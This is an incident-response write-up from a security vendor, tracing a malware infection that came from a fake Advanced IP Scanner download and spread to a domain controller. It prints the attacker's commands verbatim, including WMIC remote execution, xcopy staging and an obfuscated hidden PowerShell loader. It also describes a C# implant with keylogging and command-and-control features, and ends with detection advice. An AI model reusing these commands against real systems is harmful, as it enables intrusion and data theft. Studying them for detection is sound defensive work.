fbpx
Share on:

Executive Summary

On November 20, 2023, Blumira produced three findings that led to a Security Incident investigation regarding remote code being run on two separate XYZ Company hosts. The initial workstation host {hostname1} downloaded a malicious executable that was masked as “Advanced IP Scanner.” This file then began running automated Batch script commands and copying the behavior over to the server {DomainController2}. Via the attacker, the malicious application also began setting up a Command & Control session with an IP address hosted at CloudFlare.

Summary of incident timeline

Incident Walkthrough

Note: All IP addresses, hostnames, and usernames have been changed to protect customer data.

2023-11-20

Time: 18:57 UTC

Mitre Tactic & Technique: Discovery, T1018 – Remote System Discovery

Activity #1:TOMSMITH mistakenly downloaded malicious software on hostname1. This malicious software masked itself as Advanced IP Scanner in Google search results, and resulted in the user navigating to a fake version of this software hosted in a Cloudflare instance. The logs show the installation of this program onto hostname1 as well. Important artifacts created around this time are:

C:\ProgramData\Microsoft\NodejsToolsVsix\CG6oDkyFHl3R.t
C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t

Time: 18:59 UTC

Activity #2: A Blumira finding for Advanced IP Scanner was generated. While this wasn’t the legitimate version of Advanced IP Scanner, we do still see the value in detecting an early stage reconnaissance, as correlated activity could be early warning signs of an attack.

Time: 19:06 UTC

Mitre Tactic & Technique: Discovery, T1016 – System Network Configuration Discovery

Activity #3: Administrator runs several commands to gather information about the AD domain.

"C:\WINDOWS\system32\nslookup.exe" internaldomain.local
C:\WINDOWS\system32\systeminfo.exe"

Time: 19:06 UTC

Mitre Tactic & Technique: Execution, T1059  – Command and Scripting Interpreter

Activity #4: When the Advanced_IP_Scanner_2.5.4594.1.exe is run we can see the LOLBAS mentioned in an attack here in action. The following two commands directly afterwards show us building the DLL, and then calling the script.

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"

Time: 19:07 UTC

Mitre Tactic & Technique: Collection, T1074.002 – Data Staged: Remote Data Staging

Activity #5: Administrator runs the command below to copy a malicious batch file to the newly discovered domain controller.

"C:\WINDOWS\system32\xcopy.exe"
 c:\programdata\microsoft\LogConverter
 \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y

Time: 19:08 UTC

Mitre Tactic & Technique: Execution, T1047 – Windows Management Instrumentation

Activity #6: From hostname1 the attacker uses WMI for remote command execution to run the newly copied code on the domain controller.

"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /c
C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"

Time: 19:08 UTC

Activity #7: A Blumira finding for WMI Remote Code Execution was generated for the previous command.

Time: 19:09 UTC on DomainController2

Mitre Tactic & Technique: Execution, T1059  – Command and Scripting Interpreter

Activity #8: Now that the attacker had an available remote shell into the domain controller, they were able to run commands on the DomainController2 host. DomainController2 then runs following powershell script.

C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe  -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i
'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL
(.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable
_).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItem
Variable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"

To break this down a little:

1. This part runs PowerShell with a hidden window, which is often a tactic used by malicious scripts to hide their activity from the user: 

C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden 

2. This creates a new variable named LeX and sets it to Net.WebClient, which is a .NET class used for making web requests.

Set-Item Variable:LeX 'Net.WebClient' 

3. This sets another variable, /8i, to a specific file path. 

Set-Item Variable:/8i 
'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t' 

4. This seems to list items in the current directory with names starting with an underscore.

ls _-* 

5. The next part of the script uses complex PowerShell syntax to dynamically create and modify variables and their values. This includes accessing the execution context, modifying variable properties, and invoking methods. The script appears to be using reflection and other advanced techniques to dynamically invoke methods and manipulate objects. This is a common tactic in malicious scripts to evade detection and analysis.

Time: 19:10 UTC

Mitre Technique: Execution, T1059  – Command and Scripting Interpreter

Activity #9: We then see a batch script file running from that same directory.

"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal c:\programdata\Administrator cmd /c 
C:\ProgramData\Microsoft\LogConverter\LogConverter.bat

Time: 19:10 UTC

Activity #10: A Blumira finding for Batch Script Execution was generated. We do not alert on all batch script executions, just as we don’t alert on all programs being run. Someone remotely called the command line first from an unusual location to run this batch script.

We were also given a copy of both the CG6oDkyFHl3R.t and LogConverter.bat from the customer. The .t file was a C# application and here is a breakdown of its key functionalities:

  • Namespace and Classes: The application is contained within the namespace iVyisyGgNYMCvKq.
    • KuSyEkRq Class:
      • This class has three properties: UUID, ID, and Data. These seem to be related to identifying and storing data.
    • TrustAllCertsPolicy Class:
      • Implements the ICertificatePolicy interface and overrides the CheckValidationResult method to always return true. This trusts all SSL certificates.
    • XwOWxCEB Class:
      • Contains various DllImport statements for interacting with user32.dll and kernel32.dll.
      • Defines several static variables and methods for window management, key logging, and sending data to a remote server.
    • arXOPGDNf Class:
      • Defines methods for encrypting and decrypting byte arrays.
  • Methods
    • Main Method:
      • Calls ShowWindow to hide the console window.
      • Invokes the mDrSGqJS method with specific parameters.
    • mDrSGqJS Method:
      • Configures SSL certificate validation callback to trust all certificates.
      • Sets up parameters such as server URL, a unique identifier (cuzGRbghiiDuB), and a byte array (cRcQUEGZXJWrUs).
      • Initiates a loop to communicate with the remote server, handling various commands like “delay,” “exit,” and user input.
    • YJUBBebXRoNQCY Method:
      • Retrieves the active window’s title.
    • pmavtYHsUqft Method:
    • mTEBtfK Method:
      • Sends data to a remote server using HTTP POST requests.

An attacker designed this obfuscated program for remote control and data exfiltration. The program hides its console window, communicates with a server over HTTPS, and can execute PowerShell commands on the local machine, sending the encrypted results back to the server.

Time: 22:16 UTC

Activity #11: The malicious software masked itself as Advanced IP Scanner on DomainController2 and we updated the previously created finding with new information.

Time: 22:53 UTC

Activity #12: Customer contacts our support team.

Time: 23:37 UTC

Activity #13: Support team begins investigation.

 

2023-11-20

Time: 01:54 UTC

Activity #14: The customer manually isolates the hosts using Blumira Agent.

Time: 14:13 UTC

Activity #15: After consulting with the customer and confirming this was an attack and not something expected, a member of the Blumira team starts the process of submitting a report for the malicious Cloudflare instance via Cloudflare’s abuse page.

Time: 15:27 UTC

Activity #16: 2 files were found on hostname3 as part of an automated backup process for the Administrator profile. SentinelOne took action and blocked the file LogConverter.bat from executing.

Detection & Defense Recommendations

In this specific instance there are several different defensive recommendations from the Blumira team. 

  1. Most users should not have local administrator permissions. If you, your team, or other everyday endpoint users are running email clients, browsers, and other applications as a local or domain administrator you are opening the door to many automated attacks. Privilege escalation from your account to another device or process becomes exceedingly easier.
  2. Local administrator passwords should be complex and different per workstation. If an attacker is able to discover a single local admin password, that shouldn’t mean they are able to plug that into a script or pass the hash and have it work on every endpoint in an environment. You can use solutions like Windows LAPS to generate unique passwords locally. Windows now natively integrates LAPS, eliminating the need for external installations and also working in conjunction with Entra ID.
  3. As always I’m a huge proponent of testing your SIEM and endpoint detections whenever possible. You can perform a large amount of non-invasive tests. We’re constantly testing these detections in our labs as we create them and over time, however it’s important to ensure everything is working properly by doing testing of your own when possible. There are great tools that are freely available that assist in this testing such as Atomic Red Team, as well as some short tests you can run listed here
  4. Do you know what powershell, WMI, batch files, and the like are being executed in your environment? Controlling the directories they run from, and accounts that execute them can be very beneficial in determining anomalies.

How Blumira is Doing Better

There is no unhackable company, software, hardware, or person. I recently had a discussion the other day on the 7-min security podcast about the expectation to be bulletproof, and how that is damaging everyone on both sides of business. You as a person reading this should not expect yourself to know everything and catch everything, it’s just not possible.What is possible, is the ability for us to grow and learn over time and accept that is something that we should constantly be doing. So what could we have done better in this situation?

  1. We were in the process of creating a detection based on the LOLBAS seen at 19:06 with cvtres.exe. We fast track detections like this when seen in an incident, but we should definitely already be detecting them.
  2. Using xcopy in this manner was already on our radar, but we hadn’t prioritized it as a detection. Now that we have seen it in a confirmed attack, we have prioritized it for testing in our lab, against previous customer data to determine if we’ve had misses before, and hopefully will release it to production soon along with the detection mentioned above.

Summary

These detections were possible with the installation of either our Blumira Agent or sysmon, however the admin was able to quickly identify and quarantine these hosts with the Blumira Agent. Thanks to the quick actions from both teams, there was no downtime or further remediation needed.

# threat detection, incident response

Security news and stories right to your inbox!